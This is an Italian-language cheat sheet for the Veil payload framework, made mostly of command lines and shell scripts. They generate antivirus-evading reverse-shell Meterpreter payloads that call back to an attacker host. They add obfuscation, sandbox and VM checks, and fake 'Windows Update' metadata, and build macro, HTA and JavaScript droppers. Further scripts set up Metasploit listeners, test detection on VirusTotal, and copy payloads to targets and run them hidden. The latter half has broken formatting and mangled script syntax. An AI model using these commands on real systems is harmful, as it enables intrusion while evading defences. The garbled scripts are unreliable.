Veil Cheat Sheet (Foglio di Riferimento Veil)¶
Panoramica¶
Veil è uno strumento progettato per generare payload Metasploit che bypassano le comuni soluzioni antivirus. È parte del Veil-Framework e si concentra sulla generazione e codifica di payload per eludere il rilevamento da parte di software antivirus e sistemi di protezione degli endpoint. Veil supporta più linguaggi di programmazione e tecniche di codifica per creare payload non rilevabili per test di penetrazione e operazioni di red team.
⚠️ Avvertenza: Utilizzare Veil solo in ambienti di proprietà o per i quali si ha un esplicito permesso di test. L'uso non autorizzato può violare termini di servizio o leggi locali. Questo strumento è destinato esclusivamente a scopi legittimi di test di sicurezza.
Installazione¶
Installazione Automatica¶
# Clone the repository
git clone https://github.com/Veil-Framework/Veil.git
cd Veil
# Run the setup script
sudo ./config/setup.sh --force --silent
# Verify installation
./Veil.py --version
Installazione Manuale¶
# Install dependencies
sudo apt update
sudo apt install -y python3 python3-pip git
# Install Python dependencies
pip3 install pycrypto
pip3 install distorm3
pip3 install pefile
pip3 install capstone
# Install additional tools
sudo apt install -y mingw-w64
sudo apt install -y mono-mcs
sudo apt install -y golang-go
# Clone Veil
git clone https://github.com/Veil-Framework/Veil.git
cd Veil
# Make executable
chmod +x Veil.py
Installazione Docker¶
# Pull Docker image
docker pull mattiasohlsson/veil
# Run Veil in Docker
docker run -it --rm -v $(pwd):/output mattiasohlsson/veil
# Create alias for easier usage
echo 'alias veil="docker run -it --rm -v $(pwd):/output mattiasohlsson/veil"' >> ~/.bashrc
source ~/.bashrc
Installazione su Kali Linux¶
# Veil is pre-installed on Kali Linux
veil
# If not installed, install via apt
sudo apt update
sudo apt install veil
# Update to latest version
cd /usr/share/veil
sudo git pull
Utilizzo Base¶
Modalità Interattiva¶
# Start Veil in interactive mode
./Veil.py
# Or if installed system-wide
veil
# Navigate the menu system
# 1) Veil-Evasion (payload generation)
# 2) Veil-Ordnance (payload delivery)
Modalità Riga di Comando¶
# List available payloads
./Veil.py -t Evasion --list-payloads
# Generate payload with specific options
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# Generate payload with custom options
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-dir /tmp/payloads
# Show payload options
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --payload-options
Generazione Payload¶
Payload Python¶
# Python reverse TCP Meterpreter
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# Python reverse HTTP Meterpreter
./Veil.py -t Evasion -p python/meterpreter/rev_http --ip 192.168.1.100 --port 80
# Python reverse HTTPS Meterpreter
./Veil.py -t Evasion -p python/meterpreter/rev_https --ip 192.168.1.100 --port 443
# Python shell reverse TCP
./Veil.py -t Evasion -p python/shellcode_inject/flat --ip 192.168.1.100 --port 4444
# Python with custom encoding
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encoding base64
Payload C¶
# C# reverse TCP Meterpreter
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# C# reverse HTTP Meterpreter
./Veil.py -t Evasion -p cs/meterpreter/rev_http --ip 192.168.1.100 --port 80
# C# reverse HTTPS Meterpreter
./Veil.py -t Evasion -p cs/meterpreter/rev_https --ip 192.168.1.100 --port 443
# C# shellcode injection
./Veil.py -t Evasion -p cs/shellcode_inject/virtual --ip 192.168.1.100 --port 4444
# C# with process hollowing
./Veil.py -t Evasion -p cs/shellcode_inject/hollow --ip 192.168.1.100 --port 4444
Payload PowerShell¶
# PowerShell reverse TCP
./Veil.py -t Evasion -p powershell/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# PowerShell reverse HTTP
./Veil.py -t Evasion -p powershell/meterpreter/rev_http --ip 192.168.1.100 --port 80
# PowerShell reverse HTTPS
./Veil.py -t Evasion -p powershell/meterpreter/rev_https --ip 192.168.1.100 --port 443
# PowerShell with obfuscation
./Veil.py -t Evasion -p powershell/shellcode_inject/psexec --ip 192.168.1.100 --port 4444
Payload Go¶
# Go reverse TCP
./Veil.py -t Evasion -p go/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# Go reverse HTTP
./Veil.py -t Evasion -p go/meterpreter/rev_http --ip 192.168.1.100 --port 80
# Go reverse HTTPS
./Veil.py -t Evasion -p go/meterpreter/rev_https --ip 192.168.1.100 --port 443
# Go with custom user agent
./Veil.py -t Evasion -p go/meterpreter/rev_http --ip 192.168.1.100 --port 80 --user-agent "Mozilla/5.0"
Tecniche Avanzate di Evasione¶
Codifica e Offuscamento¶
# Base64 encoding
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encoding base64
# XOR encoding
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encoding xor
# AES encryption
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encryption aes
# Multiple encoding layers
./Veil.py -t Evasion -p python/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encoding base64,xor
# Custom encoding key
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --encoding-key "MySecretKey123"
Tecniche Anti-Analisi¶
# Sleep before execution
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --sleep 30
# Check for virtual machine
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --vm-check
# Check for debugger
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --debug-check
# Domain check
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --domain-check
# Process check
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --process-check
Opzioni Payload Personalizzate¶
# Custom executable icon
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --icon /path/to/icon.ico
# Custom executable version info
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --version-info "Microsoft Corporation"
# Custom file description
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --file-description "System Update"
# Custom product name
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --product-name "Windows Update"
# Compile as service
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --service
Metodi di Consegna Payload¶
Generazione Eseguibile¶
# Generate Windows executable
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-type exe
# Generate DLL
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-type dll
# Generate service executable
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-type service
# Generate shellcode
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-type shellcode
# Generate PowerShell script
./Veil.py -t Evasion -p powershell/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --output-type ps1
Ordnance (Consegna Payload)¶
# Start Veil-Ordnance
./Veil.py -t Ordnance
# Generate HTA payload
./Veil.py -t Ordnance -p hta/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# Generate macro payload
./Veil.py -t Ordnance -p macro/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# Generate SCT payload
./Veil.py -t Ordnance -p sct/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
# Generate JavaScript payload
./Veil.py -t Ordnance -p js/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444
Integrazione con Metasploit¶
Configurazione Handler¶
# Start Metasploit handler for Veil payload
msfconsole -q -x "
use exploit/multi/handler;
set payload windows/meterpreter/reverse_tcp;
set LHOST 192.168.1.100;
set LPORT 4444;
set ExitOnSession false;
exploit -j"
# Handler for HTTP payload
msfconsole -q -x "
use exploit/multi/handler;
set payload windows/meterpreter/reverse_http;
set LHOST 192.168.1.100;
set LPORT 80;
exploit -j"
# Handler for HTTPS payload
msfconsole -q -x "
use exploit/multi/handler;
set payload windows/meterpreter/reverse_https;
set LHOST 192.168.1.100;
set LPORT 443;
exploit -j"
Script di Risorse¶
# Create Metasploit resource script
cat > veil_handler.rc << 'EOF'
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
set ExitOnSession false
exploit -j
EOF
# Use resource script
msfconsole -r veil_handler.rc
# Multi-handler resource script
cat > multi_handler.rc ``<< 'EOF'
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
set ExitOnSession false
exploit -j
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set LHOST 192.168.1.100
set LPORT 80
set ExitOnSession false
exploit -j
EOF
Script di Automazione¶
Generazione Payload in Batch¶
#!/bin/bash
# Generate multiple Veil payloads
LHOST="192.168.1.100"
OUTPUT_DIR="veil_payloads_$(date +%Y%m%d_%H%M%S)"
mkdir -p "$OUTPUT_DIR"
# Array of payload configurations
declare -a PAYLOADS=(
"python/meterpreter/rev_tcp:4444:python_tcp"
"python/meterpreter/rev_http:80:python_http"
"cs/meterpreter/rev_tcp:4445:cs_tcp"
"cs/meterpreter/rev_http:8080:cs_http"
"powershell/meterpreter/rev_tcp:4446:ps_tcp"
"go/meterpreter/rev_tcp:4447:go_tcp"
)
echo "[+] Generating Veil payloads..."
echo "[+] LHOST: $LHOST"
echo "[+] Output directory: $OUTPUT_DIR"
for payload_config in "$\\\{PAYLOADS[@]\\\}"; do
IFS=':' read -r payload port name <<< "$payload_config"
echo "[+] Generating $name ($payload:$port)"
./Veil.py -t Evasion \
-p "$payload" \
--ip "$LHOST" \
--port "$port" \
--output-dir "$OUTPUT_DIR" \
--output-name "$name" \
--force
if [ $? -eq 0 ]; then
echo " ✓ Success: $name"
else
echo " ✗ Failed: $name"
fi
done
echo "[+] Payload generation completed"
echo "[+] Generated files:"
ls -la "$OUTPUT_DIR"
# Generate Metasploit resource script
cat >`` "$OUTPUT_DIR/handlers.rc" << EOF
# Metasploit handlers for generated payloads
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST $LHOST
set LPORT 4444
set ExitOnSession false
exploit -j
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set LHOST $LHOST
set LPORT 80
set ExitOnSession false
exploit -j
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST $LHOST
set LPORT 4445
set ExitOnSession false
exploit -j
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set LHOST $LHOST
set LPORT 8080
set ExitOnSession false
exploit -j
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST $LHOST
set LPORT 4446
set ExitOnSession false
exploit -j
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST $LHOST
set LPORT 4447
set ExitOnSession false
exploit -j
EOF
echo "[+] Metasploit resource script created: $OUTPUT_DIR/handlers.rc"
Script di Test Payload```bash¶
!/bin/bash¶
Test generated payloads against antivirus¶
PAYLOAD_DIR="$1" VIRUSTOTAL_API_KEY="your_api_key_here"
if [ -z "$PAYLOAD_DIR" ]; then
echo "Usage: $0
if [ ! -d "$PAYLOAD_DIR" ]; then echo "Error: Directory not found: $PAYLOAD_DIR" exit 1 fi
echo "[+] Testing payloads in: $PAYLOAD_DIR"
Function to upload to VirusTotal¶
upload_to_vt() \\{ local file="\(1" local filename=\)(basename "$file")
echo "[+] Uploading $filename to VirusTotal..."
response=$(curl -s -X POST \
-H "x-apikey: $VIRUSTOTAL_API_KEY" \
-F "file=@$file" \
"https://www.virustotal.com/api/v3/files")
if [ $? -eq 0 ]; then
scan_id=$(echo "$response"|jq -r '.data.id')
echo " Scan ID: $scan_id"
echo "$filename:$scan_id" >> "$PAYLOAD_DIR/vt_scans.txt"
else
echo " Upload failed"
fi
\\}
Function to check scan results¶
check_vt_results() \\{ local scan_id="\(1" local filename="\)2"
echo "[+] Checking results for $filename..."
response=$(curl -s -X GET \
-H "x-apikey: $VIRUSTOTAL_API_KEY" \
"https://www.virustotal.com/api/v3/analyses/$scan_id")
if [ $? -eq 0 ]; then
status=$(echo "$response"|jq -r '.data.attributes.status')
if [ "$status" = "completed" ]; then
stats=$(echo "$response"|jq -r '.data.attributes.stats')
malicious=$(echo "$stats"|jq -r '.malicious')
suspicious=$(echo "$stats"|jq -r '.suspicious')
undetected=$(echo "$stats"|jq -r '.undetected')
echo " Status: $status"
echo " Malicious: $malicious"
echo " Suspicious: $suspicious"
echo " Undetected: $undetected"
echo "$filename,$malicious,$suspicious,$undetected" >> "$PAYLOAD_DIR/detection_results.csv"
else
echo " Status: $status (still processing)"
fi
else
echo " Failed to get results"
fi
\\}
Upload all executables¶
echo "[+] Uploading payloads..." for file in "\(PAYLOAD_DIR"/*.exe; do if [ -f "\)file" ]; then upload_to_vt "$file" sleep 15 # Rate limiting fi done
echo "[+] Waiting for scans to complete..." sleep 300 # Wait 5 minutes
Check results¶
if [ -f "\(PAYLOAD_DIR/vt_scans.txt" ]; then echo "filename,malicious,suspicious,undetected" > "\)PAYLOAD_DIR/detection_results.csv"
while IFS=':' read -r filename scan_id; do
check_vt_results "$scan_id" "$filename"
sleep 15 # Rate limiting
done < "$PAYLOAD_DIR/vt_scans.txt"
echo "[+] Results saved to: $PAYLOAD_DIR/detection_results.csv"
else
echo "[-] No scans to check"
fi
### Script di Distribuzione Payloadbash
!/bin/bash¶
Deploy Veil payloads for testing¶
PAYLOAD_DIR="\(1"
TARGET_HOST="\)2"
TARGET_USER="$3"
if [ $# -ne 3 ]; then
echo "Usage: $0
Create remote directory¶
ssh "\(TARGET_USER@\)TARGET_HOST" "mkdir -p /tmp/test_payloads"
Copy payloads¶
for file in "\(PAYLOAD_DIR"/*.exe; do if [ -f "\)file" ]; then filename=\((basename "\)file") echo "[+] Copying \(filename..." scp "\)file" "\(TARGET_USER@\)TARGET_HOST:/tmp/test_payloads/" if [ $? -eq 0 ]; then echo " ✓ Copied successfully" else echo " ✗ Copy failed" fi fi done
Create execution script¶
cat > /tmp/execute_payloads.ps1 << 'EOF'
PowerShell script to execute payloads¶
$payloadDir = "C:\tmp\test_payloads"
\(logFile = "\)payloadDir\execution_log.txt"
Get-ChildItem -Path $payloadDir -Filter "*.exe"|ForEach-Object \\{
$payload = $.FullName
$timestamp = Get-Date -Format "yyyy-MM-dd HH
ss"
Write-Host "[+] Executing: \((\).Name)"
Add-Content -Path \(logFile -Value "\)timestamp - Executing: \((\).Name)"
try \\{
Start-Process -FilePath $payload -WindowStyle Hidden
Add-Content -Path \(logFile -Value "\)timestamp - Success: \((\).Name)"
\\}
catch \\{
Add-Content -Path \(logFile -Value "\)timestamp - Failed: \((\).Name) - \((\).Exception.Message)"
\\}
Start-Sleep -Seconds 5
\\}
EOF
Copy execution script¶
scp /tmp/execute_payloads.ps1 "\(TARGET_USER@\)TARGET_HOST:/tmp/test_payloads/" echo "[+] Deployment completed" echo "[+] To execute payloads on target:" echo " ssh \(TARGET_USER@\)TARGET_HOST" echo " powershell -ExecutionPolicy Bypass -File /tmp/test_payloads/execute_payloads.ps1" rm /tmp/execute_payloads.ps1 ```## Test di Evasione
Test Antivirus¶
```bash
Test against Windows Defender¶
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --av-test defender
Test against multiple AV engines¶
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --av-test all
Generate report¶
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --av-report
Custom AV testing¶
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --av-engines "defender,kaspersky,norton"
### Evasione Sandboxbash
Generate payload with sandbox evasion¶
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp \ --ip 192.168.1.100 \ --port 4444 \ --sandbox-evasion \ --sleep 60 \ --vm-check \ --debug-check
Time-based evasion¶
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp \ --ip 192.168.1.100 \ --port 4444 \ --time-check \ --execution-delay 300
Environment checks¶
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp \ --ip 192.168.1.100 \ --port 4444 \ --domain-check \ --process-check \ --file-check ```## Risoluzione dei Problemi
Problemi Comuni¶
Problemi di Installazione¶
```bash
Fix missing dependencies¶
sudo apt update sudo apt install -y python3-dev python3-pip pip3 install --upgrade pip
Fix Wine issues (for Windows compilation)¶
sudo dpkg --add-architecture i386 sudo apt update sudo apt install wine32
Fix MinGW issues¶
sudo apt install mingw-w64-i686-dev mingw-w64-x86-64-dev
Reinstall Veil¶
cd Veil sudo ./config/setup.sh --force ```
Errori di Compilazione¶
# Check compiler availability
which i686-w64-mingw32-gcc
which x86_64-w64-mingw32-gcc
# Fix C# compilation
sudo apt install mono-mcs mono-complete
# Fix Go compilation
export GOPATH=/usr/share/veil/go
export PATH=$PATH:/usr/local/go/bin
# Debug compilation
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --debug
Problemi di Payload¶
# Test payload generation
./Veil.py -t Evasion --list-payloads|grep meterpreter
# Check payload options
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --payload-options
# Verify output
file /var/lib/veil/output/compiled/payload.exe
strings /var/lib/veil/output/compiled/payload.exe|grep -i meterpreter
# Test payload execution
wine /var/lib/veil/output/compiled/payload.exe
Debug e Logging¶
# Enable debug mode
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --debug
# Check Veil logs
tail -f /var/lib/veil/output/veil.log
# Verbose output
./Veil.py -t Evasion -p cs/meterpreter/rev_tcp --ip 192.168.1.100 --port 4444 --verbose
# Check compilation output
cat /var/lib/veil/output/source/payload.cs
Risorse¶
- Framework Veil Ufficiale
- Documentazione Veil
- Metasploit Framework
- Tecniche di Evasione Antivirus
- Migliori Pratiche per la Generazione di Payload
- Formato Windows PE
- Tecniche di Offuscamento del Codice
Questa guida di riferimento fornisce un riferimento completo per l'utilizzo di Veil per la generazione di payload e l'evasione antivirus. Assicurati sempre di avere l'autorizzazione prima di utilizzare questo strumento in qualsiasi ambiente.